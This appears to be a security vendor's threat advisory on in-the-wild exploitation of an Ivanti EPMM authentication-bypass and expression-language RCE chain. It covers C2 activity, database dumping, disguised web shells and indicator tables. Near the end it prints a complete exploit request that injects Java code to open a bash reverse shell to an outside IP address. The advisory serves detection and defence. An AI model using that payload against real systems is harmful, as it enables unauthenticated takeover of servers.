Updated on 2025-05-21 at 10:00 (GMT+3) to clarify the relationship between the various IP addresses in the exploitation section.
Updated on 2025-05-21 at 20:00 (GMT+3) to describe additional exploitation methods observed in the wild.
Introduction
On March 13th, 2025, Ivanti disclosed that Endpoint Manager Mobile (EPMM) is affected by a vulnerability chain combining an authentication bypass (CVE-2025-4427) and a post-authentication remote code execution vulnerability (CVE-2025-4428). These flaws, which stem from unsafe use of Java Expression Language in error messages and misconfigured routing, can be exploited together to achieve unauthenticated RCE. Therefore, while neither of these vulnerabilities have been assigned critical severity (their CVSS scores are 5.3 and 7.2, respectively), in combination they should certainly be treated as critical.
Ivanti has confirmed limited exploitation in-the-wild of these vulnerabilities as 0-days prior to their disclosure, and Wiz can now confirm ongoing exploitation in-the-wild of these vulnerabilities.
What are CVE-2025-4427 and CVE-2025-4428?
CVE-2025-4428 is a post-auth remote code execution vulnerability in EPMM's DeviceFeatureUsageReportQueryRequestValidator. It arises from the unsafe handling of user-supplied input within error messages processed via Spring’s AbstractMessageSource, which allows attacker-controlled EL (Expression Language) injection. A crafted format parameter in the /api/v2/featureusage endpoint results in arbitrary Java code execution, confirmed via command injection (e.g., Runtime.exec()).
CVE-2025-4427 is an authentication bypass caused by improper request handling in EPMM’s route configuration. Routes like /rs/api/v2/featureusage were unintentionally exposed without requiring authentication due to missing <intercept-url> rules in Spring Security configurations. This allows unauthenticated access to the RCE sink, enabling full pre-auth RCE when chained with CVE-2025-4428. However, as noted by watchTowr, this is more accurately described as an order-of-operations flaw, as validator logic executes before authentication checks.
What versions are affected?
Ivanti Endpoint Manager Mobile (EPMM) in versions:
11.12.0.4 and prior
12.3.0.1 and prior
12.4.0.1 and prior
12.5.0.0 and prior
Exploitation in-the-wild
Wiz Research has observed active, in-the-wild exploitation of recently disclosed Ivanti EPMM vulnerabilities beginning on May 16th, 2025. This activity aligns with the public release of proof-of-concept (PoC) exploits by multiple sources, including watchTowr and ProjectDiscovery.
Our team has identified multiple exploitation techniques, suggesting involvement from different threat actors.
Sliver Activity
Wiz has identified multiple malicious payloads deployed following exploitation, and in one case of particular interest, a Sliver beacon using 77.221.158[.]154 as its C2 server (SHA1: 1b1dda5e8e26da568559e0577769697c624df30e). This IP address was observed in multiple prior campaigns targeting similarly exposed appliances, as revealed by our own research into exploitation of PAN-OS vulnerabilities just a few months ago (CVE-2024-0012 & CVE-2024-9474).
It appears that this IP address is still in operation by the threat actor, as its certificate hasn't changed since November 2024 and remains: Issuer: C=PL O=home.pl S.A. CN=Certyfikat SSL (fingerprint: 9f2a1967c502e0e70bec7481e6c3e32c9b5723cb20ac249255946c9a4862e956). This continuity leads us to conclude that the same actor has been opportunistically targeting both PAN-OS and Ivanti EPMM appliances.
The above certificate is served by only a small number of servers worldwide, which might be operated or compromised by this actor as well:
185.174.137[.]26
46.41.134[.]8
79.96.45[.]181
elektrobohater[.]pl
wagodirect[.]pl
e-wago[.]pl
As mentioned in our coverage of the PAN-OS exploitation activity, 77.221.158[.]154 previously resolved the domain censysinspect[.]com until it was eventually parked:
MySQL Dump Activity
Ivanti EPMM can be configured to use MySQL as a backend for various services, including as an SQL Auth Server responsible for user authentication and authorization. This configuration enables Ivanti products—such as Endpoint Mobile Manager—to rely on MySQL databases to manage user credentials and access controls.
We observed malicious activity originating from two distinct IP addresses: 82.132.235[.]212 and 37.219.84[.]22. These attackers accessed and dumped sensitive tables from the mifs MySQL database, specifically: mifs_ldap_server_config, mifs_ldap_users, mi_user.
In addition to dumping these tables, one attacker also attempted further reconnaissance within the Ivanti environment, likely in search of user credentials and additional system information.
Some of the commands were issued directly, while others were downloaded from public hosting services such as dpaste (https://dpaste[.]com/9MQEJ6VYR.txt).
Web Shell Deployment Disguised as Legitimate Content
In addition, Wiz Research identified attacker attempts to establish persistent access by uploading web shells to non-standard but plausible paths within the Ivanti EPMM environment. Specifically, we observed the placement of malicious JSP-based web shells at the following locations:
/mi/tomcat/webapps/mifs/401.jsp/mi/tomcat/webapps/mifs/css/css.css/mi/tomcat/webapps/mifs/session.jsp/mi/tomcat/webapps/mifs/baseURL.jsp
These filenames were likely chosen to blend in with legitimate HTTP error handling pages, thereby evading common detection mechanisms that scan for suspicious or out-of-place file names. By masquerading as error pages, the web shells could be accessed on demand while appearing benign in server logs or file listings.
The web shells were downloaded from public hosting services such as pastebin or GitHub, including the known Behinder WS. Other attackers opted to embed the web shell directly within the command line, encoding it in Base64 and decoding it during execution. It seems that one of the attackers also compromised a legitimate website craft-dev.greenenaftaligallery[.]com/a.txt, to host a web shell.
Reverse Shell Activity
Another notable post-exploitation technique we observed was the use of a direct reverse shell. In this method, the attackers initiated a reverse Bash connection directly through the command execution exploit. As a result, no file artifacts were created, and unlike the other methods described above, the attacker’s presence and commands were not logged in the http access logs.
GET /mifs/rs/api/v2/featureusage?format=${"".getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('sh -i >& /dev/tcp/47.120.74.19/8080 0>&1')}The above code block shows an example of one such reverse shell exploitation.
Indicators of compromise
Wiz Research has identified the following IOCs related to this activity:
| IOC | Description |
|---|---|
| 1b1dda5e8e26da568559e0577769697c624df30e | Sliver Beacon (SHA1) |
| ac389c8b7f3d2fcf4fd73891f881b12b8343665b | Sliver Beacon (SHA1) |
| 19b4df629f5b15e5ff742c70d2c7dc4dac29a7ce | Unpacked Sliver Beacon (SHA1) |
| f780151c151b6cec853a278b4e847ef2af3dbc5d | Packed Sliver Beacon (SHA1) - Downloaded from attacker’s infrastructure |
| dce8faf5fcf5998b6802995914caa988ee1ebd92 | Unpacked Sliver Beacon (SHA1) - Downloaded from attacker’s infrastructure |
| aa2cfeeca6c8e7743ad1a5996fe5ccc3d52e901d | JSP Webshell written to session.jsp |
| 2bd61ce5bdd258c7dcbef53aedb1b018b8e0ae26 | JSP Webshell hosted on craft-dev.greenenaftaligallery[.]com |
| 77.221.158[.]154 | Sliver C2 IP Address |
| 150.241.97[.]83 | Sliver C2 IP Address |
| 185.193.125[.]65 | IP Address Hosting Sliver |
IPs observed in exploitation attempts (between 16.5.25-19.5.25):
| IOC | Description |
|---|---|
| 82.132.235[.]212 | MySQL Dumping Activity |
| 37.219.84[.]22 | MySQL Dumping Activity |
| 88.194.29[.]21 | MySQL Dumping Activity(VPN) |
| 27.25.148[.]183 | Direct Reverse Shell Activity |
| 83.229.126[.]234 | Direct Reverse Shell Activity |
| 91.193.19[.]109 | Direct Reverse Shell Activity (VPN) |
| 47.120.74[.]19 | Direct Reverse Shell Activity (VPN) |
| 100.26.51[.]59 | Hosted malicious payload under /ws (VPN) |
| 150.241.71[.]231 | Attacker conducting Sliver deployment (VPN) |
| 75.170.92[.]132 | Behinder WS deployment |
| 5.181.159[.]149 | Behinder WS deployment (VPN) |
| 45.38.17[.]43 | WS deployment (VPN) |
| 75.170.92[.]132 | WS deployment |
What steps should security teams take?
It is recommended to patch EPMM to one of the following patched versions: 11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1, while prioritizing Internet-facing appliances.
Implement network-level restrictions on the
/rs/api/v2/*and/mifs/rs/api/v2/*endpoints until patches are applied.
How Wiz can help
Wiz customers can use the pre-built queries and advisory in the Wiz Threat Intelligence Center to search for vulnerable or compromised instances of Ivanti EPMM in their environment. Wiz detects vulnerable and/or infected Ivanti devices through a combination of agentless scanning of our customers’ cloud environments and active unauthenticated scanning using the Wiz Dynamic Scanner.
At Wiz, we’ve built a platform uniquely equipped to respond to high-profile threats to cloud environments with unmatched agility and depth. By integrating disk-level insights, external exploitability validation, log scanning, and agentless malware detection, Wiz provides full visibility across the lifecycle of risk management and threat response in the cloud. This approach has proven to be especially effective when applied to defending virtual appliances, which are often out of scope for traditional EDR solutions.
When new threats to your cloud environment emerge, Wiz immediately helps you:
Identify any vulnerable or misconfiguration instances of the targeted software in your environment, with additional runtime context using the Wiz Sensor and Code-to-Cloud context using Wiz Code.
Validate exploitability from the outside and effectively prioritize assets at risk, based on the context of affected resources such as high privileges or sensitive data access.
Gain visibility into any resources compromised by threat actors, while also providing you with automatic analysis of the incident’s blast radius.
This unique approach gives you full transparency and control, so you can stay ahead of attackers and protect what matters most to your business.
